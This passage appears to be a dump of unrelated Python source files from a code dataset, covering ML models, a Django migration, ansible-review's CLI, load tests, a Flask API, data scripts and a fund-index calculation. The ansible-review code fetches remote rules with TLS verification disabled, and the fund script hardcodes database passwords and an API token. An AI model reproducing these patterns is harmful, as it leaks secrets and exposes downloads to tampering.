3, 3],\n [3, 3, 3]]\n \npadding_types = ['VALID'] * 6\n\n\nbaseline_config = {\n 'weights': [\n # Convolution layers\n ('wc1', tf.truncated_normal([3, 5, 5, config.NUM_CHANNELS, 16], stddev=0.01)),\n ('wc2', tf.truncated_normal([3, 3, 3, 16, 32], stddev=0.01)),\n ('wc3', tf.truncated_normal([3, 3, 3, 32, 32], stddev=0.01)),\n # Fully connected layers\n ('wd1', tf.truncated_normal([calculate_conv_output_size(n_x, n_y, n_z, \n strides, \n filters,\n padding_types, \n 32), \n 100], stddev=0.01)),\n ('wout', tf.truncated_normal([100, config.N_CLASSES], stddev=0.01))\n ],\n 'biases': [\n # Convolution layers\n ('bc1', tf.zeros([16])),\n ('bc2', tf.constant(1.0, shape=[32])),\n ('bc3', tf.zeros([32])),\n # Fully connected layers\n ('bd1', tf.constant(1.0, shape=[100])),\n ('bout', tf.constant(1.0, shape=[config.N_CLASSES]))\n ],\n 'pool_strides': [\n [1, 2, 4, 4, 1],\n [1, 2, 2, 2, 1],\n [1, 2, 2, 2, 1],\n ],\n 'pool_windows': [\n [1, 3, 5, 5, 1],\n [1, 3, 3, 3, 1],\n [1, 3, 3, 3, 1],\n ],\n 'strides': [\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n ]\n}","sub_path":"model_definition/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210747351","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('DotaStats', '0003_scikitmodel'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='playerinmatch',\n name='hero_damage',\n field=models.IntegerField(),\n preserve_default=True,\n ),\n ]\n","sub_path":"migrations/0004_auto_20150406_1555.py","file_name":"0004_auto_20150406_1555.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606395874","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport logging\nimport optparse\nimport os\nimport sys\nimport io\nimport glob\nimport ssl\nfrom urllib2 import urlopen\nfrom zipfile import ZipFile\nfrom ansiblereview.version import __version__\nfrom ansiblereview import classify\nfrom ansiblereview.utils import info, warn, read_config\nfrom appdirs import AppDirs\nfrom pkg_resources import resource_filename\n\n\ndef get_candidates_from_diff(difftext):\n try:\n import unidiff\n except ImportError as e:\n raise SystemExit(\"Could not import unidiff library: %s\", e.message)\n patch = unidiff.PatchSet(sys.stdin)\n\n candidates = []\n for patchedfile in [patchfile for patchfile in\n patch.added_files + patch.modified_files]:\n if patchedfile.source_file == '/dev/null':\n candidates.append(patchedfile.path)\n else:\n lines = \",\".join([\"%s-%s\" % (hunk.target_start, hunk.target_start + hunk.target_length)\n for hunk in patchedfile])\n candidates.append(\"%s:%s\" % (patchedfile.path, lines))\n return candidates\n\n\ndef main():\n config_dir = AppDirs(\"ansible-review\", \"com.github.willthames\").user_config_dir\n default_config_file = os.path.join(config_dir, \"config.ini\")\n\n parser = optparse.OptionParser(\"%prog playbook_file|role_file|inventory_file\",\n version=\"%prog \" + __version__)\n parser.add_option('-c', dest='configfile', default=default_config_file,\n help=\"Location of configuration file: [%s]\" % default_config_file)\n parser.add_option('-w', dest='workdir',\n help=\"Dir to look for files, also used to checkout git repo if specified\")\n parser.add_option('-g', dest='ruleszip',\n help=\"Weburl containing zip location of rules i.e from a git repo\")\n parser.add_option('-d', dest='rulesdir',\n help=\"Location of standards rules relative if -g used\")\n parser.add_option('-r', dest='lintdir',\n help=\"Location of additional lint rules relative if -g used\")\n parser.add_option('-q', dest='log_level', action=\"store_const\", default=logging.WARN,\n const=logging.ERROR, help=\"Only output errors\")\n parser.add_option('-s', dest='standards_filter', action='append',\n help=\"limit standards to specific names\")\n parser.add_option('-t', dest='output_type', action=\"store_const\", default=\"stdout\",\n const=\"cc\", help=\"Change to Code Climate output type\")\n parser.add_option('-v', dest='log_level', action=\"store_const\", default=logging.WARN,\n const=logging.INFO, help=\"Show more verbose output\")\n\n options, args = parser.parse_args(sys.argv[1:])\n settings = read_config(options.configfile)\n\n # Merge CLI options with config options. CLI options override config options.\n for key, value in settings.__dict__.iteritems():\n if not getattr(options, key):\n setattr(options, key, getattr(settings, key))\n\n if options.ruleszip and options.workdir:\n zipurl = options.ruleszip\n tlscontext = ssl._create_unverified_context()\n if zipurl.startswith('http'):\n zipresp = urlopen(zipurl, context=tlscontext)\n else:\n zipresp = open(zipurl, 'r')\n zfile = ZipFile(io.BytesIO(zipresp.read()))\n zfile.extractall(options.workdir)\n\n if options.workdir:\n if options.rulesdir and options.ruleszip:\n rulesdirtmp = glob.glob(options.workdir + \"/*/\" + options.rulesdir)\n info(\"Using standards rules from: %s\" % rulesdirtmp[0], options)\n options.rulesdir = rulesdirtmp[0]\n else:\n rulesdirtmp = os.path.join(options.workdir, options.rulesdir)\n info(\"Using standards rules from: %s\" % rulesdirtmp, options)\n options.rulesdir = rulesdirtmp\n\n if options.lintdir and options.ruleszip:\n lintdirtmp = glob.glob(options.workdir + \"/*/\" + options.lintdir)\n info(\"Using lint rules from: %s\" % lintdirtmp[0], options)\n options.lintdir = lintdirtmp[0]\n else:\n lintdirtmp = os.path.join(options.workdir, options.lintdir)\n info(\"Using lint rules from: %s\" % lintdirtmp, options)\n options.lintdir = lintdirtmp\n\n if os.path.exists(options.configfile):\n info(\"Using configuration file: %s\" % options.configfile, options)\n else:\n if not options.rulesdir:\n rules_dir = os.path.join(resource_filename('ansiblereview', 'examples'))\n warn(\"Using example standards found at %s\" % rules_dir, options, file=sys.stderr)\n options.rulesdir = rules_dir\n if not options.lintdir:\n lint_dir = os.path.join(options.rulesdir, 'lint-rules')\n if os.path.exists(lint_dir):\n warn(\"Using example lint-rules found at %s\" % lint_dir, options, file=sys.stderr)\n options.lintdir = lint_dir\n if not options.rulesdir and not options.lintdir:\n warn(\"No configuration file found at %s\" % options.configfile, options, file=sys.stderr)\n\n if len(args) == 0:\n candidates = get_candidates_from_diff(sys.stdin)\n else:\n candidates = args\n\n errors = 0\n for filename in candidates:\n if ':' in filename:\n (filename, lines) = filename.split(\":\")\n else:\n lines = None\n candidate = classify(filename)\n if candidate:\n if candidate.binary:\n warn(\"Not reviewing binary file %s\" % filename, options)\n continue\n if lines:\n info(\"Reviewing %s lines %s\" % (candidate, lines), options)\n else:\n info(\"Reviewing all of %s\" % candidate, options)\n errors = errors + candidate.review(options, lines)\n else:\n warn(\"Couldn't classify file %s\" % filename, options)\n return errors\n","sub_path":"lib/ansiblereview/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"193172855","text":"\"\"\"Plot the results of the WM segmentation and compare it with the ICBM152 2009\natlas.\n\nParameters\n----------\nPATH_TO_DATA: list of str\n The path is a list of filename with possibility to use a wildcard, e.g.\n ['/example/*/file.nii.gz', '/anotherone/*/file.nii.gz].\n\nPATH_OUTPUT : str\n Location to store the plots. To easily generate the HTML report, it should\n be located in the same repository in `images/qa`\n\n\"\"\"\n\nimport glob\nfrom os import makedirs, listdir\nfrom os.path import join, exists, basename, normpath, isdir\nimport matplotlib.pyplot as plt\nfrom nilearn.datasets import fetch_icbm152_2009\nfrom nilearn.image import load_img\nfrom nilearn.plotting import plot_epi\n\ntemplate = fetch_icbm152_2009()\nwm_template = load_img(template.wm)\ncsf_template = load_img(template.csf)\n\nPATH_TO_DATA = ['/home/lemaitre/Documents/data/ABIDEII-IP_1/*']\nPATH_OUTPUT = './images/qa'\n\nsubjects_path = []\nfor pdata in PATH_TO_DATA:\n subjects_path += glob.glob(pdata)\nsubjects_path = sorted(subjects_path)\nsubjects_path = [sp for sp in subjects_path if isdir(sp)]\n\n# all data are display in the standard space\nfor path_subject in subjects_path:\n # try:\n content_dir = listdir(path_subject)\n run_path = sorted([folder\n for folder in content_dir\n if isdir(join(path_subject, folder)) and\n 'run_' in folder])\n subject_id = basename(normpath(path_subject))\n for rp in run_path:\n # get the mean which is stored outside of the data path\n mean_func_img = load_img(join(\n path_subject, rp, 'session_1', 'rest_1',\n 'rest_filt_mean_func2standard.nii.gz'))\n wm_seg_img = load_img(join(path_subject, rp,\n 'session_1', 'segment',\n 'wm2standard.nii.gz'))\n csf_seg_img = load_img(join(path_subject, rp,\n 'session_1', 'segment',\n 'csf2standard.nii.gz'))\n\n if not exists(join(PATH_OUTPUT, subject_id, rp)):\n makedirs(join(PATH_OUTPUT, subject_id, rp))\n\n print('Checking patient in path: {}'.format(path_subject))\n\n display = plot_epi(mean_func_img, title='WM segmentation',\n draw_cross=False, cut_coords=(17., -3., 8.))\n display.add_contours(wm_seg_img, levels=[0.3], colors='w')\n display.add_contours(wm_template, levels=[0.3], colors='w',\n linestyles='dashed')\n plt.savefig(join(PATH_OUTPUT, subject_id, rp, 'wm.png'))\n # except ValueError:\n # print('Missing data for patient: {}'.format(path_subject))\n","sub_path":"quality_assurance/segmentation_quality_check.py","file_name":"segmentation_quality_check.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"37051263","text":"\"\"\"\nSimluating the scenario where all requests from users are read intensive.\n\"\"\"\n\nimport sys, random\nfrom locust import HttpLocust, TaskSet\n\n\ndef readPost(locust):\n # Use '/editor/post?action=open' as name for the request\n postid = random.randint(1, 500)\n url_prefix = '/editor/post?action=open'\n url_params = '&username=cs144&postid=' + str(postid)\n locust.client.get(url_prefix + url_params, name = url_prefix)\n\nclass MyTaskSet(TaskSet):\n tasks = [readPost]\n\nclass MyLocust(HttpLocust):\n task_set = MyTaskSet\n min_wait = 1000\n max_wait = 2000","sub_path":"Project5_Web_Benchmark_and_Spark/read_tomcat.py","file_name":"read_tomcat.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503728911","text":"import subprocess\nimport os\nimport shutil\nfrom zipfile import ZipFile\n\n# create requirements file\nif os.path.exists(\"pipfile.lock\") == True:\n # create requirements file\n requirements = open(\"requirements.txt\", 'w')\n subprocess.call([\"pipenv\", \"lock\", \"-r\"], stdout= requirements)\n print(\"requirements file created\")\n #install dependencies to temp packages catalog\n subprocess.call([\"pip3\", \"install\", \"-r\", \"requirements.txt\", \"--target\", \"./packages\"])\n print(\"dependencies installed\")\n requirements.close()\n # copy project dependencies\n src = os.getcwd()\n dst = os.path.join(src, \"packages\")\n\n for item in os.listdir(src):\n if item in (\"base\", \"utils\"):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n if os.path.exists(d):\n shutil.rmtree(d)\n shutil.copytree(s, d, symlinks=True)\n else:\n shutil.copy2(s, d, follow_symlinks=True)\n print(\"local dependencies copied\")\n\n # zip packages\n zip_file = ZipFile(\"packages.zip\" , mode='w')\n path_len = len(\"packages\")\n for root, _ , files in os.walk(\"packages\"):\n for file in files:\n file_path = os.path.join(root, file)\n zip_file.write(file_path , file_path[path_len :] )\n zip_file.close()\n os.remove(\"./requirements.txt\")\n shutil.rmtree(dst)\nelse:\n exit(\"Missing pipfile.lock\")\n","sub_path":"build_dependencies.py","file_name":"build_dependencies.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212199772","text":"from flask import Blueprint, Flask, jsonify, abort, request, make_response, url_for\nfrom app import db \n\nmodule_api = Blueprint('api', __name__, url_prefix='/api') \n\n\n\ntasks = [\n {\n 'id': 1,\n 'title': u'Buy groceries',\n 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',\n 'done': False\n },\n {\n 'id': 2,\n 'title': u'Learn Python',\n 'description': u'Need to find a good Python tutorial on the web',\n 'done': False\n }\n]\n\n\ndef make_public_task(task):\n new_task = {}\n for field in task:\n if field == 'id':\n new_task['uri'] = url_for('get_task', task_id=task['id'],\n _external=True)\n else:\n new_task[field] = task[field]\n return new_task\n\n\n@module_api.route('/tasks', methods=['GET'])\ndef get_tasks():\n #return jsonify({'tasks': [make_public_task(task) for task in tasks]})\n return jsonify(tasks)\n\n\n@module_api.route('/tasks/', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': make_public_task(task[0])})\n\n\n@module_api.route('/tasks', methods=['POST'])\ndef create_task():\n if not request.json or 'title' not in request.json:\n abort(400)\n task = {\n 'id': tasks[-1]['id'] + 1,\n 'title': request.json['title'],\n 'description': request.json.get('description', \"\"),\n 'done': False\n }\n tasks.append(task)\n return jsonify({'task': make_public_task(task)}), 201\n\n\n@module_api.route('/tasks/', methods=['PUT'])\ndef update_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n if not request.json:\n abort(400)\n if 'title' in request.json and \\\n not isinstance(request.json['title'], six.string_types):\n abort(400)\n if 'description' in request.json and \\\n not isinstance(request.json['description'], six.string_types):\n abort(400)\n if 'done' in request.json and type(request.json['done']) is not bool:\n abort(400)\n task[0]['title'] = request.json.get('title', task[0]['title'])\n task[0]['description'] = request.json.get('description',\n task[0]['description'])\n task[0]['done'] = request.json.get('done', task[0]['done'])\n return jsonify({'task': make_public_task(task[0])})\n\n\n@module_api.route('/tasks/', methods=['DELETE'])\ndef delete_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n tasks.remove(task[0])\n return jsonify({'result': True})\n","sub_path":"app/api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477440141","text":"import pandas as pd\nimport numpy as np\n\n# df_all = pd.DataFrame.from_csv('SPO_UP_50000.csv', index_col=None, sep='\\t')\ndf_all = pd.DataFrame.from_csv('SPO_UPDATED.csv', index_col=None, sep='\\t')\n\nprint('all', len(df_all))\nmain_data = ['SPO4__CSF__C', 'SPO4__OUTCOME__C']\n\nrename_dict = {'SPO4__PLAYBOOK_NAME__C': 'PlayBook',\n 'SPO4__OUTCOME_STAGE__C': 'Stage',\n 'SPO4__CSF_CATEGORY__C': 'CSF_category',\n 'SPO4__CSF__C': 'CSF',\n 'SPO4__OUTCOME__C': 'Outcome'\n }\n\n# print(copy_group_columns)\n\n\ndf_all = df_all[(df_all['SPO4__PLAYBOOK_NAME__C'] == 'Competitive deal >$50M >$25M CE/UKI or >$10M APAC/LATAM/MEA')\n | (df_all['SPO4__PLAYBOOK_NAME__C'] == 'Competitive deal $10-50M $10-25M CE/UKI or $5-10M APAC/LATAM/MEA')\n | (df_all['SPO4__PLAYBOOK_NAME__C'] == 'Competitive deal $2-10M or $2-5M APAC/LATAM/MEA')\n]\n\n\ngroups = [\n ['1',],\n ['2',],\n ['3',],\n ['4',],\n ['5',],\n ['1', '2',],\n ['3', '4',],\n ['3', '4', '5',],\n ['1', '2', '3', '4',],\n ['1', '2', '3', '4', '5',],\n\n]\ndf_all['COLOR_NUM'] = df_all['SPO4__COLOR__C']\ndf_all.COLOR_NUM.replace(['green', 'grey', 'red'], [1, 0, -1], inplace=True)\n\ndf_all.SPO4__OUTCOME_STAGE__C.replace([\n '1. Engagement',\n '2. Shaping',\n '3. Solutioning',\n '4. End-Game',\n '5. Negotiation'],\n ['1', '2', '3', '4', '5', ], inplace=True)\n\n\ngroup_columns = ['SPO4__CSF__C', 'SPO4__OPPORTUNITY__C']\ncopy_group_columns = group_columns.copy()\ncopy_group_columns.append('COLOR_NUM')\n\nfor group in groups:\n print('!!! group!!!')\n print(group)\n\n df_group = pd.DataFrame()\n\n for stage in group:\n df_part = df_all[df_all['SPO4__OUTCOME_STAGE__C'] == stage]\n df_group = df_group.append(df_part)\n\n print('group grom all len', len(df_group))\n\n df_book_with_csf = df_group[copy_group_columns].groupby(group_columns).agg(['min'])\n\n df_book_with_csf.reset_index(inplace=True)\n print('size of groupby',len(df_book_with_csf))\n\n # df_book_with_csf.to_csv('t.csv')\n df_result = pd.DataFrame()\n opportunities = list(set(df_group['SPO4__OPPORTUNITY__C'].drop_duplicates()))\n df_result['SPO4__OPPORTUNITY__C'] = opportunities\n df_result.set_index('SPO4__OPPORTUNITY__C', inplace=True)\n\n\n # print(df_result)\n\n results = df_group[['SPO4__OPPORTUNITY__C', 'SPO4__PLAYBOOK_NAME__C', 'OPPORTUNITY_WON__C']].drop_duplicates()\n\n results.set_index('SPO4__OPPORTUNITY__C', inplace=True)\n\n df_result = df_result.merge(results, how='left', left_index=True, right_index=True)\n\n csfs = list(set(df_group['SPO4__CSF__C'].drop_duplicates()))\n print('CSF:', len(csfs))\n csfs.sort()\n\n for csf in csfs:\n # df_result[csf] = np.nan\n df_result[csf] = 0\n\n for i, row in df_book_with_csf.iterrows():\n\n op = row['SPO4__OPPORTUNITY__C'].values[0]\n cs = row['SPO4__CSF__C'].values[0]\n num = row['COLOR_NUM']['min']\n\n df_result.loc[op, cs] = num\n\n # df_won = df_result[df_result['OPPORTUNITY_WON__C'] == 'Won']\n # df_won.fillna(1, inplace = True)\n # df_lost = df_result[df_result['OPPORTUNITY_WON__C'] == 'Lost']\n # df_lost.fillna(-1, inplace = True)\n # df_result = df_won.append(df_lost)\n\n\n\n print('group_result_size', df_result.size)\n name_group = \"_\".join(group)\n df_result.to_csv('csf_data_sets\\csf_{}.csv'.format(name_group), index=True,sep='\\t')\n#\n# # df_csf['part_green/(green+red+grey)%'] = (df_csf['green'] * 100.0)/(df_csf['green'] + df_csf['grey'] + df_csf['red'])\n# # df_csf['part_won/(won+lost) %'] = (df_csf['Won'] * 100.0)/(df_csf['Won'] + df_csf['Lost'])\n# # df_csf.fillna(0, inplace=True)\n#\n# # print(df_csf)\n# df_csf.rename(index=str, columns=rename_dict, inplace=True)\n# print(df_csf)\n# df_csf.to_excel(writer, sheet_name='data', index=False)\n\n#\n#\n# df_csf.to_excel('csf.xlsx', index=False)\n# df_oc.to_excel('oc.xlsx', index=False)\n","sub_path":"CTS/create_groupby_csf.py","file_name":"create_groupby_csf.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81894276","text":"#Here text is case sensitive so Dat and dat are mapped to diffrent word index. Moreover punctuation is maintained\r\n\r\nimport tensorflow as tf\r\nimport tensorflow_datasets as tfds\r\nimport numpy as np\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nimport io\r\n\r\n\r\nembedding_dim = 64\r\n\r\ntraining_sentences = []\r\ntraining_labels = []\r\nimdb, info = tfds.load(\"imdb_reviews/subwords8k\", with_info=True, as_supervised=True) #tokenized and encoded imdb dataset with vocab size of 8k i.e tokenizer.vocab_size = 8185\r\ntrain_data, test_data = imdb['train'], imdb['test']\r\ntokenizer = info.features['text'].encoder # The dataset info includes the text encode\r\n\r\n\r\nprint(len(tokenizer.subwords)) #7928\r\nprint(tokenizer.subwords) #['the_', ', ', '. ', 'a_', 'and_', 'of_', 'to_', 's_', 'is_', 'br', 'in_', 'I_', 'that_', 'this_', 'it_', ' /><',.........]\r\n\r\nBUFFER_SIZE = 10000\r\nBATCH_SIZE = 64\r\n\r\ntrain_data = train_data.shuffle(BUFFER_SIZE)\r\ntrain_data = train_data.padded_batch(BATCH_SIZE, padded_shapes=([None],[]))\r\ntest_data = test_data.padded_batch(BATCH_SIZE,padded_shapes=([None],[]))\r\n\r\n\r\nsample = 'Data Science is a very cool, and amazing thing to learn'\r\ntoken_string = tokenizer.encode(sample) #[878, 1848, 2675, 2975, 9, 4, 67, 2724, 2, 5, 1006, 233, 7, 5635]\r\n\r\nprint(token_string)\r\n\r\norig_string = tokenizer.decode(token_string)\r\nprint(orig_string)\r\n\r\nprint(tokenizer.vocab_size) #8185\r\n\r\nfor t in token_string:\r\n\tprint('{} --> {}'.format(t, tokenizer.decode([t])))\r\n'''\r\n878 --> Da\r\n1848 --> ta\r\n2675 --> Sci\r\n2975 --> ence\r\n9 --> is\r\n4 --> a\r\n67 --> very\r\n2724 --> cool\r\n2 --> ,\r\n5 --> and\r\n1006 --> amazing\r\n233 --> thing\r\n7 --> to\r\n5635 --> learn\r\n'''\r\nmodel = tf.keras.Sequential([\r\n\t\r\n tf.keras.layers.Embedding(input_dim = tokenizer.vocab_size, output_dim = embedding_dim), #The results of the embedding will be a 2D vector with one embedding for each word in the input sequence of words (input sentence)\r\n tf.keras.layers.GlobalAveragePooling1D(), #Often in natural language processing, a different layer type than a Flatten is used, and this is a GlobalAveragePooling1D. The reason for this is the size of the output vector being fed into the dense\r\n tf.keras.layers.Dense(6, activation='relu'),\r\n tf.keras.layers.Dense(1, activation='sigmoid')\r\n])\r\nmodel.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])\r\nmodel.summary()\r\n\r\nnum_epochs = 10\r\nmodel.fit(train_data, epochs=num_epochs, validation_data=test_data)\r\n\r\n","sub_path":"NLP using TF/Week 2/subwrd_token_2.py","file_name":"subwrd_token_2.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556188500","text":"import argparse\nimport email\nimport logging\nimport io\nimport re\nimport sys\n\nfrom datetime import datetime\nfrom shared import get_logger, init_exception_handler\n\n\n####################################################################################################\n#\n# Parse image from a raw email and save it to disk\n# This is super specific to uploading the image from dvr163 emails\n#\n####################################################################################################\n\n# Read arguments\nparser = argparse.ArgumentParser(description='Save images from email')\nparser.add_argument(\n 'infile',\n nargs='?',\n type=argparse.FileType('r'),\n default=sys.stdin,\n help='MIME-encoded email file(if empty, stdin will be used)')\nparser.add_argument('--out_directory', required=True)\nparser.add_argument('--log_level', default='40', help='10=debug 20-info 30=warning 40=error', type=int)\nparser.add_argument('--log_file', default='email2file.log', help='Log file location', type=str)\nargs = parser.parse_args() \n\n# Configure logging\nlogger = get_logger(args.log_level, args.log_file)\nlogger.debug(args)\n\n# Log exceptions\ninit_exception_handler(logger)\n\n# Read infile (is stdin if no arg) \nstdin_data = args.infile.read()\nargs.infile.close()\nlogger.debug('in:\\n' + stdin_data)\nmsg = email.message_from_string(stdin_data)\n\n# Parse out the html text\nhtml_part = msg.get_payload(0).get_payload()\nclean_html = re.sub(r'(?is)<(script|style).*?>.*?()', '', html_part.strip()) # Remove style tags\nhtml_text = re.sub(r'(?s)<.*?>', ' ', clean_html).strip() # Get text content\ntext_parts = html_text.split(\"; \")\nlogger.debug('Found HTML text: ' + html_text)\nchannel_number = text_parts[0][-1:]\ntimestamp = re.sub(r' ', '_', re.sub(r'[-:]', '', text_parts[1][5:]))\n\n# Read the image\nimage_part = msg.get_payload(1).get_payload()\nfile_name = timestamp + '.jpg'\nfile = io.BytesIO(image_part.decode('base64')).read()\n\n# Save\nout_path = args.out_directory + '/snapshot_cam_' + channel_number + '.jpg'\nlogger.debug('Saving ' + out_path)\nout_file = open(out_path, \"w\")\nout_file.write(file)\nout_file.close()\n\nlogger.info('Saved ' + file_name)\n","sub_path":"email2file.py","file_name":"email2file.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"499370496","text":"import queries\nimport datetime\n\n\ndef active_users(executor):\n nicks = queries.all_nicks(executor)\n filtered_nicks = list()\n\n for nick in nicks:\n if is_user_active(executor, nick) and not is_user_a_bot(nick):\n filtered_nicks.append(nick)\n\n return filtered_nicks\n\n\ndef is_user_active(executor, nick):\n time = datetime.timedelta(weeks=1)\n date = datetime.datetime.utcnow()\n date = date - time\n\n num = queries.get_distinct_line_count_since_date(executor, nick, date.isoformat())\n\n return num > 15\n\n\ndef is_user_a_bot(nick):\n return nick[-1] == '^'\n","sub_path":"userutils.py","file_name":"userutils.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266844034","text":"from importlib import reload\nimport sys\nsys.path.append(\"D:/Projects/PythonProject/ZSAssetManagementResearch/Scripts/algorithm\")\nsys.path.append(\"D:/Projects/Python/3.5.2/ZSAssetManagementResearch/Scripts/algorithm\")\nsys.path.append(\"/usr/local/python/3.5.2/user-defined-module\")\nimport calendar as cld\nimport datetime as dt\nimport json\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom sqlalchemy import create_engine, inspect\nimport time\nimport TimeModule as T\nimport DerivedIndicator_Fund_2 as F\n\ndef tic(string):\n print(dt.datetime.now(), \"------\", string)\n\ndef merge_result(r1, r2, r3):\n result = r1[:]\n for i in range(len(result[1])):\n if result[1][i] is None:\n if r2[1][i] is not None:\n result[1][i] = r2[1][i]\n result[0][i] = r2[0][i]\n else:\n if r3[1][i] is not None:\n result[1][i] = r3[1][i]\n result[0][i] = r3[0][i]\n else:\n continue\n return result\n\nresult_r = {}\ncomponents_num = {}\n\nfirst_year = 2014\nnow = dt.datetime.now()\nnow_str = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nfor year in range(first_year, now.timetuple().tm_year+1):\n\n if year == now.timetuple().tm_year:\n month = 9\n else:\n month = 12\n\n date_s = dt.datetime(year, month, 10)\n date_e = date_s + dt.timedelta(1)\n date_e_str = date_e.strftime(\"%Y-%m-%d\")\n\n sql_i = \"\\\n SELECT fund_id, nav, statistic_date FROM fund_nv_data WHERE statistic_date < '{0}' and statistic_date >= '{1}' \\\n AND fund_id IN (SELECT fund_id FROM fund_type_mapping WHERE type_code = 60108) \\\n ORDER BY fund_id ASC, statistic_date DESC \\\n \".format(dt.date(year+1, 1, 8), dt.date(year-1, 12, 1))\n\n #conn = create_engine(\"mysql+pymysql://jr_admin_test_0:e6524540d9733355c27d344876b15cf467251215@120.55.69.127:3306/base?charset=utf8\")\n conn = create_engine(\"mysql+pymysql://jr_admin_test_0:e6524540d9733355c27d344876b15cf467251215@127.0.0.1:3306/base?charset=utf8\")\n conn.connect()\n\n tic(\"Getting Data\")\n d = pd.read_sql(sql_i, conn).dropna()\n d.index = range(len(d))\n\n tic(\"Preprocessing...\")\n d[\"statistic_date\"] = d[\"statistic_date\"].apply(lambda x: time.mktime(x.timetuple()))\n d_dd = d.drop_duplicates(\"fund_id\")\n idx_slice = d_dd.index.tolist()\n idx_slice.append(len(d))\n ids = d_dd[\"fund_id\"].tolist()\n\n t_std = T.timeseries_std(dt.datetime(year, month, 10), month, 12, 1, use_lastday=True)\n t_std1 = t_std[:-1]\n\n tic(\"Grouping...\")\n ds = [d[idx_slice[i]:idx_slice[i+1]] for i in range(len(idx_slice)-1)]\n ts = [x[\"statistic_date\"].tolist() for x in ds]\n navs = [x[\"nav\"].tolist() for x in ds]\n\n tic(\"Matching...\")\n matchs1 = [T.outer_match4index_f7(x, t_std1, False) for x in ts]\n #matchs2 = [T.outer_match4index_b7(x, t_std1, False) for x in ts]\n matchs2 = [T.outer_match4index_b7_2(x, t_std1) for x in ts]\n matchs3 = [T.outer_match4index_m(x, t_std, False) for x in ts]\n matchs = [merge_result(x1, x2, x3) for x1, x2, x3 in zip(matchs1, matchs2, matchs3)]\n\n tic(\"Getting Result...\")\n t_matchs = [x[0] for x in matchs]\n t_matchs = [T.tr(x) for x in t_matchs]\n idx_matchs = [x[1] for x in matchs]\n nav_matchs = [[navs[i][idx] if idx is not None else None for idx in idx_matchs[i].values()] for i in range(len(idx_matchs))]\n\n\n tic(\"Calculating Index...\")\n nvs = pd.DataFrame(nav_matchs).T.astype(float).as_matrix()\n rs = nvs[:-1] / nvs[1:] - 1\n rs[rs>30] = np.nan\n rs[rs<-1] = np.nan\n r = np.nanmean(rs, axis=1)\n r[np.isnan(r)] = 0\n\n result_r[year] = r\n components_num[year] = np.sum(~np.isnan(rs), axis=1)\n tic(\"Year:{0}, Done...\".format(year))\n\nvalues_r = []\nvalues_num = []\nfor year in range(first_year, now.timetuple().tm_year+1):\n if len(values_r) == 0:\n values_r = result_r[year].tolist()[::-1]\n values_num = components_num[year].tolist()[::-1]\n else:\n values_r.extend(result_r[year].tolist()[::-1])\n values_num.extend(components_num[year].tolist()[::-1])\n\nresult = (np.array(values_r) + 1).cumprod() * 1000\nresult = result.tolist()\nresult.insert(0, 1000)\nvalues_num.insert(0, 0)\n\ntag = T.timeseries_std(dt.datetime(year, month+1, 10), T.periods_in_interval(dt.datetime(year, month+1, 10), dt.datetime(first_year, 1, 10), 12), 12)[::-1]\ntag = [dt.date.fromtimestamp(x) for x in tag]\n\n#op = pd.DataFrame(list(zip(tag, result, values_num)))\n#op.columns = [\"date\", \"index_m_yu\", \"components_num\"]\n#op.to_csv(\"C:\\\\Users\\\\Kael Yu\\\\Desktop\\\\fund_index_12_m.csv\", index=False)\n\n\n#Send Result\n\nurl_status = \"http://120.55.69.127:8080/get_data-api/program/forward/status\"\nurl_progress = \"http://120.55.69.127:8080/get_data-api/program/forward/progress\"\nurl_result = \"http://120.55.69.127:8080/get_data-api/program/get_data/write\"\ns = requests.session()\n\ntoken = \"bda1850a2a907fa33b0cb1241f5f742bb4138b1c\"\nparams = sys.argv[1]\npl = {\"token\":str(token), \"parms\":str(params)}\n\ndatas = []\nfor i in range(len(tag)):\n res_tmp = {\"index_id\": \"FI12\", \"index_name\":\"多策略私募指数\", \"statistic_date\":str(tag[i]), 